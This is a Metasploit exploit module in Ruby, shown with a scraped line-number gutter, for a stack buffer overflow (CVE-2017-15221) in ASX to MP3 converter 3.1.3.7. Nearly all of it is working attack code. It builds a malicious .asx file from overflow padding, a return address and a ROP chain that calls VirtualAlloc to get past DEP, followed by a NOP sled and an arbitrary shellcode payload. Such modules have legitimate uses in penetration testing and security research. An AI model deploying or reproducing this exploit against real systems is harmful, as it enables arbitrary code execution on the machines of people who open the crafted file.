1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info={})
super(update_info(info,
'Name' => "ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (DEP)",
'Description' => %q{
This module exploits a stack buffer overflow in ASX to MP3 converter 3.1.3.7.
By constructing a specially crafted ASX file and attempting to convert it to an MP3 file in the
application, a buffer is overwritten, which allows for running shellcode.
Tested on: Microsoft Windows 7 Enterprise, 6.1.7601 Service Pack 1 Build 7601, x64-based PC
Microsoft Windows 10 Pro, 10.0.18362 N/A Build 18362, x64-based PC
},
'License' => MSF_LICENSE,
'Author' =>
[
'Maxim Guslyaev', # EDB POC, Metasploit Module
],
'References' =>
[
[ 'CVE', '2017-15221' ],
[ 'EDB', '47468' ]
],
'Platform' => 'win',
'Targets' =>
[
[
'Windows 7 Enterprise/10 Pro',
{
'Ret' => 0x1002D038 # RET
}
]
],
'Payload' =>
{
'BadChars' => "\x00\x09\x0a"
},
'Privileged' => false,
'DisclosureDate' => "Oct 06 2019",
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [true, 'The malicious file name', 'music.asx'])
])
end
def exploit
buf = "http://"
buf += "A" * 17417 + [target.ret].pack("V") + "CCCC"
## Save allocation type (0x1000) in EDX
buf += [0x10047F4D].pack("V") # ADC EDX,ESI # POP ESI # RETN
buf += [0x11111111].pack("V")
buf += [0x10029B8C].pack("V") # XOR EDX,EDX # RETN
buf += [0x1002D493].pack("V") # POP EDX # RETN
buf += [0xEEEEFEEF].pack("V")
buf += [0x10047F4D].pack("V") # ADC EDX,ESI # POP ESI # RETN
buf += [0x41414141].pack("V")
## Save the address of VirtualAlloc() in ESI
buf += [0x1002fade].pack("V") # POP EAX # RETN [MSA2Mfilter03.dll]
buf += [0x1004f060].pack("V") # ptr to &VirtualAlloc() [IAT MSA2Mfilter03.dll]
buf += [0x1003239f].pack("V") # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSA2Mfilter03.dll]
buf += [0x10040754].pack("V") # PUSH EAX # POP ESI # POP EBP # LEA EAX,DWORD PTR DS:[ECX+EAX+D] # POP EBX # RETN
buf += [0x41414141].pack("V")
buf += [0x41414141].pack("V")
## Save the size of the block in EBX
buf += [0x1004d881].pack("V") # XOR EAX,EAX # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x1003b34d].pack("V") # ADD EAX,29 # RETN
buf += [0x10034735].pack("V") # PUSH EAX # ADD AL,5D # MOV EAX,1 # POP EBX # RETN
## Save the address of (# ADD ESP,8 # RETN) in EBP
buf += [0x10031c6c].pack("V") # POP EBP # RETN
buf += [0x10012316].pack("V") # ADD ESP,8 # RETN
#buf += [0x1003df73].pack("V") # & PUSH ESP # RETN
## Save memory protection code (0x40) in ECX
buf += [0x1002ca22].pack("V") # POP ECX # RETN
buf += [0xFFFFFFFF].pack("V")
buf += [0x10031ebe].pack("V") # INC ECX # AND EAX,8 # RETN
buf += [0x10031ebe].pack("V") # INC ECX # AND EAX,8 # RETN
buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
buf += [0x1002a5b7].pack("V") # ADD ECX,ECX # RETN
## Save ROP-NOP in EDI
buf += [0x1002e346].pack("V") # POP EDI # RETN
buf += [0x1002D038].pack("V") # RETN
## Save NOPs in EAX
#buf += [0x1003bca4].pack("V") # POP EAX # RETN [MSA2Mfilter03.dll]
#buf += [0x90909090].pack("V") # nop
## Set up the EAX register to contain the address of # PUSHAD #RETN and JMP to this address
buf += [0x1002E516].pack("V") # POP EAX # RETN
buf += [0xA4E2F275].pack("V")
buf += [0x1003efe2].pack("V") # ADD EAX,5B5D5E5F # RETN
buf += [0x10040ce5].pack("V") # PUSH EAX # RETN
buf += "\x90" * 4
buf += [0x1003df73].pack("V") # & PUSH ESP # RETN
buf += "\x90" * 20
buf += payload.encoded
file_create(buf)
end
end
|